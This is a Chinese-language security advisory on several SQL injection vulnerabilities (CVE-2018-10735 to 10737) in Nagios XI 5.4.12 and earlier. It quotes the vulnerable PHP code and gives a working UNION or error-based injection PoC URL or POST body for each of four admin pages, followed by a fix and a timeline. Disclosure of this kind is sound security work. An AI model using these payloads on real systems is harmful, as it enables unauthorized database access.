NagiosXI <= 5.4.12 多个SQL注入漏洞

漏洞简介

Nagios 是一款开源的免费网络监视工具,能有效监控 Windows、Linux和 Unix 的主机状态,交换机路由器等网络设备,打印机等。在系统或服务状态异常时发出邮件或短信报警第一时间通知网站运维人员,在状态恢复后发出正常的邮件或短信通知。Nagios XI 在小于等于 5.4.12 的版本中存在多个 SQL 注入漏洞。

漏洞影响

  • Nagios XI 5.2.x
  • Nagios XI 5.4.x 小于 5.4.13

漏洞分析

commandline.php SQL 注入漏洞(CVE-2018-10735)

nagiosql/admin/commandline.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
$preNoMain 		= 1;

require("../functions/prepend_adm.php");
$strCommandLine = "&nbsp;";
$intCount = 0;
//
// Datenbank abfragen
// ===================
if (isset($_GET['cname']) && ($_GET['cname'] != "")) {
$strResult = $myDBClass->getFieldData("SELECT command_line FROM tbl_command WHERE id='".$_GET['cname']."'");
if ($strResult != false) {
$strCommandLine = $strResult;
$intCount = substr_count($strCommandLine,"ARG");
if (substr_count($strCommandLine,"ARG8") != 0) {
$intCount = 8;
} else if (substr_count($strCommandLine,"ARG7") != 0) {
$intCount = 7;
} else if (substr_count($strCommandLine,"ARG6") != 0) {
$intCount = 6;
} else if (substr_count($strCommandLine,"ARG5") != 0) {
$intCount = 5;
} else if (substr_count($strCommandLine,"ARG4") != 0) {
$intCount = 4;
} else if (substr_count($strCommandLine,"ARG3") != 0) {
$intCount = 3;
} else if (substr_count($strCommandLine,"ARG2") != 0) {
$intCount = 2;
} else if (substr_count($strCommandLine,"ARG1") != 0) {
$intCount = 1;
} else {
$intCount = 0;
}

}
}

参数cname是完全没有任何过滤的,直接拼接到了SQL语句中,从而造成SQL注入漏洞。

PoC
1
http://xxx/nagiosql/admin/commandline.php?cname='%20union%20select%20concat(0x7e7e7e,user(),0x7e7e7e)%23

info.php SQL 注入漏洞(CVE-2018-10736)

nagiosql/admin/info.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$preNoMain  = 1;
require("../functions/prepend_adm.php");
//
// Übergabeparameter
// =================
$chkKey1 = isset($_GET['key1']) ? $_GET['key1'] : "";
$chkKey2 = isset($_GET['key2']) ? $_GET['key2'] : "";
$chkVersion = isset($_GET['version']) ? $_GET['version'] : "";
//
// Daten holen
// ===========
$strSQL = "SELECT `infotext` FROM `tbl_info`
WHERE `key1` = '$chkKey1' AND `key2` = '$chkKey2' AND `version` = '$chkVersion' AND `language` = 'private'";
$strContentDB = $myDBClass->getFieldData($strSQL);
if ($strContentDB == "") {
$strSQL = "SELECT `infotext` FROM `tbl_info`
WHERE `key1` = '$chkKey1' AND `key2` = '$chkKey2' AND `version` = '$chkVersion' AND `language` = 'default'";
$strContentDB = $myDBClass->getFieldData($strSQL);
}
?>

参数key1key2还有version都是没有过滤直接拼接到 SQL 语句中,从而造成 SQL 注入漏洞。

PoC
1
http://xxxx/nagiosql/admin/info.php?key1='%20union%20select%20concat(0x7e7e7e,user(),0x7e7e7e)%23

logbook.php SQL注入漏洞(CVE-2018-10737)

nagiosql/admin/logbook.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
......
$chkFromLine = isset($_GET['from_line']) ? $_GET['from_line']+0 : 0;
$chkDelFrom = isset($_POST['txtFrom']) ? $_POST['txtFrom'] : "";
$chkDelTo = isset($_POST['txtTo']) ? $_POST['txtTo'] : "";
$chkSearch = isset($_POST['txtSearch']) ? $_POST['txtSearch'] : "";
//
// Daten löschen
// =============
if (isset($_POST['txtFrom']) && (($chkDelFrom != "") || ($chkDelTo != ""))) {
$strWhere = "";
if ($chkDelFrom != "") {
$strWhere .= "AND `time` > '$chkDelFrom 00:00:00'";
}
if ($chkDelTo != "") {
$strWhere .= "AND `time` < '$chkDelTo 23:59:59'";
}
$strSQL = "DELETE FROM `tbl_logbook` WHERE 1=1 $strWhere";
$booReturn = $myDBClass->insertData($strSQL);
if ($booReturn == false) {
$strMessage .= _('Error while selecting data from database:')."<br>".$myDBClass->strDBError."<br>";
$intError = 1;
} else {
$strMessage .= _('Dataset successfully deleted. Affected rows:')." ".$myDBClass->intAffectedRows;
}
}
//
// Datensuche
// ==========
if ($chkSearch != "") {
$strWhere = "WHERE `user` LIKE '%$chkSearch%' OR `ipadress` LIKE '%$chkSearch%' OR `domain` LIKE '%$chkSearch%' OR `entry` LIKE '%$chkSearch%'";
} else {
$strWhere = "";
}
......

参数txtSearch是完全没有任何过滤的,直接拼接到了SQL语句中,从而造成SQL注入漏洞。

PoC
1
2
3
http://xxxx/nagiosql/admin/logbook.php

postdata: txtSearch=-1%' and (select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

nagiosql/admin/menuaccess.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
$preAccess    = 1;
$preFieldvars = 1;
require("../functions/prepend_adm.php");
//
// Übergabeparameter
// =================
$chkSubMenu = isset($_POST['selSubMenu']) ? $_POST['selSubMenu']+0 : 0;
$chkInsKey1 = isset($_POST['chbKey1']) ? $_POST['chbKey1'] : 0;
$chkInsKey2 = isset($_POST['chbKey2']) ? $_POST['chbKey2'] : 0;
$chkInsKey3 = isset($_POST['chbKey3']) ? $_POST['chbKey3'] : 0;
$chkInsKey4 = isset($_POST['chbKey4']) ? $_POST['chbKey4'] : 0;
$chkInsKey5 = isset($_POST['chbKey5']) ? $_POST['chbKey5'] : 0;
$chkInsKey6 = isset($_POST['chbKey6']) ? $_POST['chbKey6'] : 0;
$chkInsKey7 = isset($_POST['chbKey7']) ? $_POST['chbKey7'] : 0;
$chkInsKey8 = isset($_POST['chbKey8']) ? $_POST['chbKey8'] : 0;
//
// Daten verarbeiten
// =================
$strKeys = $chkInsKey1.$chkInsKey2.$chkInsKey3.$chkInsKey4.$chkInsKey5.$chkInsKey6.$chkInsKey7.$chkInsKey8;
if (isset($_POST['subSave']) && ($chkSubMenu != 0)) {
$strSQL = "UPDATE `tbl_submenu` SET `access_rights`='$strKeys' WHERE `id`=$chkSubMenu";
$booReturn = $myDBClass->insertData($strSQL);
if ($booReturn == false) {
$strMessage .= _('Error while inserting the data to the data base:')."<br>".$myDBClass->strDBError."<br>";
$intError = 1;
} else {
$strMessage .= _('Data were successfully inserted to the data base!');
$myDataClass->writeLog(_('Access keys set for menu item:')." ".$myDBClass->getFieldData("SELECT `item` FROM `tbl_submenu` WHERE `id`=$chkSubMenu"));
}
}
//

参数chbKey1是完全没有任何过滤的,直接拼接到了SQL语句中,从而造成SQL注入漏洞。要进入到SQL语句中,参数subSave不能为空,参数selSubMenu不能为0。

PoC
1
2
3
4
http://xxxx/nagiosql/admin/menuaccess.php

postdata:
chbKey1=' or updatexml(2,concat(0x7e,(version())),0) or''#&selSubMenu=1&subSave=1

漏洞修复

  • 升级到 5.4.13 版本。

时间线

  • 2018年5月3日发现漏洞
  • 2018年5月4日确定官方已修复该漏洞
  • 2018年5月5日申请CVE
  • 2018年5月17日公开漏洞